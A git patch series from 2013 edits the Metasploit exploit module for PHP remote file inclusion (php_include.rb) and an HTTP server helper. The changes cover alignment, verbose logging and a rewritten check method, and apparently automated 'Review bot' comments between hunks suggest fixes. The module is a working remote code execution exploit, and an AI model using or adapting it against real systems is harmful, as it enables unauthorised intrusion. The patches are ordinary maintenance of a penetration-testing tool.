From 98b4c653c086e1d1dfea9a29884a7581386ea041 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Sat, 17 Aug 2013 17:35:09 +0100 Subject: [PATCH 1/4] php_include - uses verbose --- modules/exploits/unix/webapp/php_include.rb | 35 +++++++++++---------- 1 file changed, 19 insertions(+), 16 deletions(-) diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index a03941c399..75528cebeb 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -16,36 +16,36 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'PHP Remote File Include Generic Code Execution', - 'Description' => %q{ + 'Name' => 'PHP Remote File Include Generic Code Execution', + 'Description' => %q{ This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: }, - 'Author' => [ 'hdm' , 'egypt', 'ethicalhack3r' ], - 'License' => MSF_LICENSE, - #'References' => [ ], - 'Privileged' => false, - 'Payload' => + 'Author' => [ 'hdm' , 'egypt', 'ethicalhack3r' ], + 'License' => MSF_LICENSE, + #'References' => [ ], + 'Privileged' => false, + 'Payload' => { 'DisableNops' => true, - 'Compat' => + 'Compat' => { 'ConnectionType' => 'find', }, # Arbitrary big number. The payload gets sent as an HTTP # response body, so really it's unlimited - 'Space' => 262144, # 256k + 'Space' => 262144, # 256k }, 'DefaultOptions' => { 'WfsDelay' => 30 }, 'DisclosureDate' => 'Dec 17 2006', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ @@ -86,6 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote end def php_exploit + # Set verbosity level + verbose = datastore['VERBOSE'].to_s.downcase + uris = [] tpath = normalize_uri(datastore['PATH']) 
@@ -128,21 +131,21 @@ class Metasploit3 < Msf::Exploit::Remote uris.each do |uri| break if session_created? - # print_status("Sending #{tpath+uri}") + print_status("Sending: #{rhost+tpath+uri}") if verbose == "true" begin if http_method == "GET" response = send_request_raw( { 'global' => true, - 'uri' => tpath+uri, + 'uri' => tpath+uri, 'headers' => datastore_headers, }, timeout) elsif http_method == "POST" response = send_request_raw( { 'global' => true, - 'uri' => tpath+uri, + 'uri' => tpath+uri, 'method' => http_method, - 'data' => postdata, + 'data' => postdata, 'headers' => datastore_headers.merge({ 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => postdata.length From 02e394e1c33854119b457536473c4352c3411963 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Sat, 17 Aug 2013 17:36:43 +0100 Subject: [PATCH 2/4] php_include - fix check --- modules/exploits/unix/webapp/php_include.rb | 52 ++++++++++++--------- 1 file changed, 29 insertions(+), 23 deletions(-) diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 75528cebeb..6aa118e609 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' 
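Review bot: The POST branch's `'Content-Length' => postdata.length` counts characters rather than bytes, so a request body containing multi-byte characters is sent with a Content-Length that is smaller than the payload actually written; `'Content-Length' => postdata.bytesize` is the value to send. That line is unchanged context in this hunk, but it sits on the new side of the request code being reworked here and is the one part of the header block the commit does not touch. The `uris.each` loop continues past the end of the hunk.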
@@ -17,20 +17,20 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Remote File Include Generic Code Execution', - 'Description' => %q{ + 'Description' => %q{ This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: }, 'Author' => [ 'hdm' , 'egypt', 'ethicalhack3r' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, #'References' => [ ], 'Privileged' => false, - 'Payload' => + 'Payload' => { 'DisableNops' => true, - 'Compat' => + 'Compat' => { 'ConnectionType' => 'find', }, @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 17 2006', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Targets' => [[ 'Automatic', { }]], + 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0)) register_options([ @@ -59,19 +59,25 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - def check - uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : "" - if(uri and ! uri.empty?) - uri.gsub!(/\?.*/, "") - print_status("Checking uri #{uri}") - response = send_request_raw({ 'uri' => uri}) - return Exploit::CheckCode::Detected if response.code == 200 - print_error("Server responded with #{response.code}") - return Exploit::CheckCode::Safe - else - return Exploit::CheckCode::Unknown + def check + uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : "" + + tpath = normalize_uri(datastore['PATH']) + if tpath[-1,1] == '/' + tpath = tpath.chop + end + + if(uri and ! uri.empty?) + uri.gsub!(/\?.*/, "") + print_status("Checking uri #{rhost+tpath+uri}") + response = send_request_raw({ 'uri' => tpath+uri}) + return Exploit::CheckCode::Detected if response.code == 200 + print_error("Server responded with #{response.code}") + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Unknown + end end - end def datastore_headers headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : "" 
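Review bot: In the rewritten `check` (hunk `@@ -59,19 +59,25 @@`), `response.code` is evaluated without first confirming that `send_request_raw` returned a response, so a connection failure or timeout raises NoMethodError out of `check` instead of yielding a CheckCode; add `return Exploit::CheckCode::Unknown unless response` before the `response.code == 200` test. The trailing-slash handling can be collapsed to `tpath = normalize_uri(datastore['PATH']).chomp('/')`, which replaces the `tpath[-1,1] == '/'` / `chop` block and is a no-op when there is no trailing slash. The new side also appears to indent the whole of `check` one level deeper than `datastore_headers` below it (the old `if`'s `end` is reused as the context line that now closes the new `def`), which is worth aligning with the rest of the class before merge.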
@@ -136,18 +142,18 @@ class Metasploit3 < Msf::Exploit::Remote if http_method == "GET" response = send_request_raw( { 'global' => true, - 'uri' => tpath+uri, + 'uri' => tpath+uri, 'headers' => datastore_headers, }, timeout) elsif http_method == "POST" response = send_request_raw( { - 'global' => true, + 'global' => true, 'uri' => tpath+uri, - 'method' => http_method, - 'data' => postdata, + 'method' => http_method, + 'data' => postdata, 'headers' => datastore_headers.merge({ - 'Content-Type' => 'application/x-www-form-urlencoded', + 'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Length' => postdata.length }) }, timeout) From 71a3f59c250545c6fb904c90612fd26f5d77d8c2 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Sat, 17 Aug 2013 18:30:39 +0100 Subject: [PATCH 3/4] php_include - added error handler --- lib/msf/core/exploit/http/server.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 1435d0282d..927ee4a83c 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -501,7 +501,11 @@ module Exploit::Remote::HttpServer # Guard against removing resources added by other modules if @my_resources.include?(name) @my_resources.delete(name) - service.remove_resource(name) + begin + service.remove_resource(name) + rescue ::Exception => e + print_error("Exception: #{e.class} #{e}") + end end end From 7efe85dbd6a57ea6ee6e6225acf9e374215bafa4 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Tue, 27 Aug 2013 14:00:13 +0100 Subject: [PATCH 4/4] php_include - added @wchen-r7's code improvements --- lib/msf/core/exploit/http/server.rb | 6 +----- modules/exploits/unix/webapp/php_include.rb | 5 +---- 2 files changed, 2 insertions(+), 9 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 927ee4a83c..1435d0282d 100644 --- a/lib/msf/core/exploit/http/server.rb 
+++ b/lib/msf/core/exploit/http/server.rb @@ -501,11 +501,7 @@ module Exploit::Remote::HttpServer # Guard against removing resources added by other modules if @my_resources.include?(name) @my_resources.delete(name) - begin - service.remove_resource(name) - rescue ::Exception => e - print_error("Exception: #{e.class} #{e}") - end + service.remove_resource(name) end end diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb index 6aa118e609..d2c029239e 100644 --- a/modules/exploits/unix/webapp/php_include.rb +++ b/modules/exploits/unix/webapp/php_include.rb @@ -92,9 +92,6 @@ class Metasploit3 < Msf::Exploit::Remote end def php_exploit - # Set verbosity level - verbose = datastore['VERBOSE'].to_s.downcase - uris = [] tpath = normalize_uri(datastore['PATH']) @@ -137,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote uris.each do |uri| break if session_created? - print_status("Sending: #{rhost+tpath+uri}") if verbose == "true" + vprint_status("Sending: #{rhost+tpath+uri}") begin if http_method == "GET" response = send_request_raw( {